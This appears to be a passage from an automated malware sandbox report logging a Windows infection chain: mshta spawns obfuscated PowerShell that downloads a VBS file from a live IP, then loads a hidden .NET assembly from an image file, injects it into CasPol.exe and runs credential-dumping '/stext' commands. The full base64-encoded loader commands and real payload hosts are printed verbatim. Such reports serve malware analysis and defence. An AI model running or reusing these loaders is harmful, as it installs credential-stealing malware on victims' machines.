                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: CB4008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00410F36
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418754 mouse_event,12_2_00418754
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXEJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD4B.tmp" "c:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nupmhthbjzo"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jffvicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkzc1uwxbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlumrfrkloaxrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifnrexneeixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmeuf5ymesc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrmziaegsdwludcagicagicagicagicagicagicagicagicagicagicagihrqyyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbpbxf1agx2bujjktsnicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicaid2prt094rwxyiiagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicbnd3vyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrrvto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk0lje3ms4xmzgvmzi5l2nyzwf0zxrozwjlc3r0agluz3n3axroz29vzhroaw5nc2jlc3rmb3jncmvhdhroaw5nc2zvcm1lzxzlbmdvb2qudelgiiwijgvuvjpbufbeqvrbxgnyzwf0zxrozwjlc3r0agluz3n3axroz29vzhroaw5nc2jlc3rmb3jncmvhdhroaw5nc2zvcm1lzxzllnziuyismcwwkttzdgfsvc1zbgvfccgzkttprxggicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgnyzwf0zxrozwjlc3r0agluz3n3axroz29vzhroaw5nc2jlc3rmb3jncmvhdhroaw5nc2zvcm1lzxzllnziuyi='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdzse5pbwfnzvvybca9igi0rmh0dhbzoi8vmtaxjysnny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmhtvetqm0xdnlnrdeljt2nfvdm1jysndyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnycrjzzhmdkwngygyjrgo3nitndlyknsjysnawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7cycrj0hoaw1hz2vcexrlcya9ihnitndlyknsawvudc5eb3dubg8nkydhzerhdgeoc0hoaw1hz2vvcmwpo3nitmltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz10nkyc6olvurjgur2v0u3ryaw5nkhnitmltjysnywdlqnl0zxmpo3nitnn0yxj0rmxhzya9igi0rjw8qkftrty0x1nuqvjupj5iney7c0hozw5krmxhzya9iccrj2i0rjw8qkftrty0x0vord4+yjrgo3nitnn0yxj0sw5kzxggpsbzsccrj05pbwfnzvrljysnehqusw5kzxhpzihzse5zdgfydezsywcpo3nitmvuzeluzccrj2v4id0gc0hoaw1hz2vuzxh0lkluzgv4t2yoc0hozw5krmxhzyk7c0hoc3rhcnrjbmrlecatz2ugmcatyw5kihnitmvuzeluzgv4ic1ndcbzse5zdgfydccrj0luzgv4o3nitnn0jysnyxj0sw5kzxggkz0gc0hoc3rhcnrgbgfnjysnlkxlbmd0adtzse5iyxnljysnnjrmzw5ndgggpsbzse5lbmrjbmrlecatihnitnn0yxj0sw5kzxg7c0hoymfzzty0q29tbwfuzca9ihniticrj2knkydtywdlvgv4dc5tdwjzdhjpbmcoc0hoc3rhcnrjbmrlecwgc0hoymfzzty0tgvuz3rokttzse5iyxnlnjrszxzlcnnlzca9ic1qb2luichzse5iyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgczdniezvckvhy2gtt2jqzwn0ihsgc0hoxyb9kvstms4ulshzse5iyxnlnjrdb21tyw5klkxlbmd0acldo3nitmnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtjysndhjpbmcoc0hoymenkydzzty0umv2zxjzzwqpo3nitmxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzccrjyhzse5jb21tyw5kqnl0zxmpo3nitnzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoyjrgvkfjyjrgkttzse52ywlnzxrob2qusw52bycrj2tlkhnitm51bgwsieaoyjrgdhh0lkveu1nsri85mjmvodmxlje3ms40os4zmi8vonb0dghineysigi0rmrlc2f0axzhzg9ineysigi0rmrlc2f0axzhzg9inccrj0ysigi0rmrlc2f0axzhzg9ineysigi0rknhc1bvbccrj2i0riwgyjrgzgvzyxrpdmfkb2i0riwgyjrgzgvzyxrpdmfkb2inkyc0rixinezkzxnhdgl2ywqnkydvyjrglgi0rmrlc2f0axzhzg9ineysyjrgzgvzyxrpdmfkb2i0rixinezkzxnhdgl2ywrvyjrglgi0rmrlc2f0axzhzg9ijysnneysyjrgmwi0rixinezkzxnhdgl2ywrvyjrgksk7jykuukvwbgfdzsgnyjrgjyxbc1rysw5nxvtdsgfyxtm5ks5srxbsyunlkcdzse4nlcckjykuukvwbgfdzsgnczdnjywnfccpihwmicggjfbzag9tzvs0xsskufnit21fwzmwxssnwccp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('shnimageurl = b4fhttps://101'+'7.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmtkj3lc6sqticoc_t35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4f;shnwebcl'+'ient = new-object system.net.webclient;s'+'hnimagebytes = shnwebclient.downlo'+'addata(shnimageurl);shnimagetext = [system.text.encoding]'+'::utf8.getstring(shnim'+'agebytes);shnstartflag = b4f<<base64_start>>b4f;shnendflag = '+'b4f<<base64_end>>b4f;shnstartindex = sh'+'nimagete'+'xt.indexof(shnstartflag);shnendind'+'ex = shnimagetext.indexof(shnendflag);shnstartindex -ge 0 -and shnendindex -gt shnstart'+'index;shnst'+'artindex += shnstartflag'+'.length;shnbase'+'64length = shnendindex - shnstartindex;shnbase64command = shn'+'i'+'magetext.substring(shnstartindex, shnbase64length);shnbase64reversed = -join (shnbase64command.tochararray() s7g foreach-object { shn_ })[-1..-(shnbase64command.length)];shncommandbytes = [system.convert]::frombase64s'+'tring(shnba'+'se64reversed);shnloadedassembly = [system.reflection.assembly]::load'+'(shncommandbytes);shnvaimethod = [dnlib.io.home].getmethod(b4fvaib4f);shnvaimethod.invo'+'ke(shnnull, @(b4ftxt.edssrf/923/831.171.49.32//:ptthb4f, b4fdesativadob4f, b4fdesativadob4'+'f, b4fdesativadob4f, b4fcaspol'+'b4f, b4fdesativadob4f, b4fdesativadob'+'4f,b4fdesativad'+'ob4f,b4fdesativadob4f,b4fdesativadob4f,b4fdesativadob4f,b4fdesativadob'+'4f,b4f1b4f,b4fdesativadob4f));').replace('b4f',[string][char]39).replace('shn','$').replace('s7g','|') |& ( $pshome[4]+$pshome[30]+'x')"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jffvicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkzc1uwxbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlumrfrkloaxrjt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9ulkrmtcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifnrexneeixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmeuf5ymesc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagrmziaegsdwludcagicagicagicagicagicagicagicagicagicagicagihrqyyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbpbxf1agx2bujjktsnicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicaid2prt094rwxyiiagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicbnd3vyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrrvto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk0lje3ms4xmzgvmzi5l2nyzwf0zxrozwjlc3r0agluz3n3axroz29vzhroaw5nc2jlc3rmb3jncmvhdhroaw5nc2zvcm1lzxzlbmdvb2qudelgiiwijgvuvjpbufbeqvrbxgnyzwf0zxrozwjlc3r0agluz3n3axroz29vzhroaw5nc2jlc3rmb3jncmvhdhroaw5nc2zvcm1lzxzllnziuyismcwwkttzdgfsvc1zbgvfccgzkttprxggicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgnyzwf0zxrozwjlc3r0agluz3n3axroz29vzhroaw5nc2jlc3rmb3jncmvhdhroaw5nc2zvcm1lzxzllnziuyi='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdzse5pbwfnzvvybca9igi0rmh0dhbzoi8vmtaxjysnny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9mkfhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmhtvetqm0xdnlnrdeljt2nfvdm1jysndyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnycrjzzhmdkwngygyjrgo3nitndlyknsjysnawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7cycrj0hoaw1hz2vcexrlcya9ihnitndlyknsawvudc5eb3dubg8nkydhzerhdgeoc0hoaw1hz2vvcmwpo3nitmltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz10nkyc6olvurjgur2v0u3ryaw5nkhnitmltjysnywdlqnl0zxmpo3nitnn0yxj0rmxhzya9igi0rjw8qkftrty0x1nuqvjupj5iney7c0hozw5krmxhzya9iccrj2i0rjw8qkftrty0x0vord4+yjrgo3nitnn0yxj0sw5kzxggpsbzsccrj05pbwfnzvrljysnehqusw5kzxhpzihzse5zdgfydezsywcpo3nitmvuzeluzccrj2v4id0gc0hoaw1hz2vuzxh0lkluzgv4t2yoc0hozw5krmxhzyk7c0hoc3rhcnrjbmrlecatz2ugmcatyw5kihnitmvuzeluzgv4ic1ndcbzse5zdgfydccrj0luzgv4o3nitnn0jysnyxj0sw5kzxggkz0gc0hoc3rhcnrgbgfnjysnlkxlbmd0adtzse5iyxnljysnnjrmzw5ndgggpsbzse5lbmrjbmrlecatihnitnn0yxj0sw5kzxg7c0hoymfzzty0q29tbwfuzca9ihniticrj2knkydtywdlvgv4dc5tdwjzdhjpbmcoc0hoc3rhcnrjbmrlecwgc0hoymfzzty0tgvuz3rokttzse5iyxnlnjrszxzlcnnlzca9ic1qb2luichzse5iyxnlnjrdb21tyw5kllrvq2hhckfycmf5kckgczdniezvckvhy2gtt2jqzwn0ihsgc0hoxyb9kvstms4ulshzse5iyxnlnjrdb21tyw5klkxlbmd0acldo3nitmnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtjysndhjpbmcoc0hoymenkydzzty0umv2zxjzzwqpo3nitmxvywrlzefzc2vtymx5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzccrjyhzse5jb21tyw5kqnl0zxmpo3nitnzhau1ldghvzca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoyjrgvkfjyjrgkttzse52ywlnzxrob2qusw52bycrj2tlkhnitm51bgwsieaoyjrgdhh0lkveu1nsri85mjmvodmxlje3ms40os4zmi8vonb0dghineysigi0rmrlc2f0axzhzg9ineysigi0rmrlc2f0axzhzg9inccrj0ysigi0rmrlc2f0axzhzg9ineysigi0rknhc1bvbccrj2i0riwgyjrgzgvzyxrpdmfkb2i0riwgyjrgzgvzyxrpdmfkb2inkyc0rixinezkzxnhdgl2ywqnkydvyjrglgi0rmrlc2f0axzhzg9ineysyjrgzgvzyxrpdmfkb2i0rixinezkzxnhdgl2ywrvyjrglgi0rmrlc2f0axzhzg9ijysnneysyjrgmwi0rixinezkzxnhdgl2ywrvyjrgksk7jykuukvwbgfdzsgnyjrgjyxbc1rysw5nxvtdsgfyxtm5ks5srxbsyunlkcdzse4nlcckjykuukvwbgfdzsgnczdnjywnfccpihwmicggjfbzag9tzvs0xsskufnit21fwzmwxssnwccp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
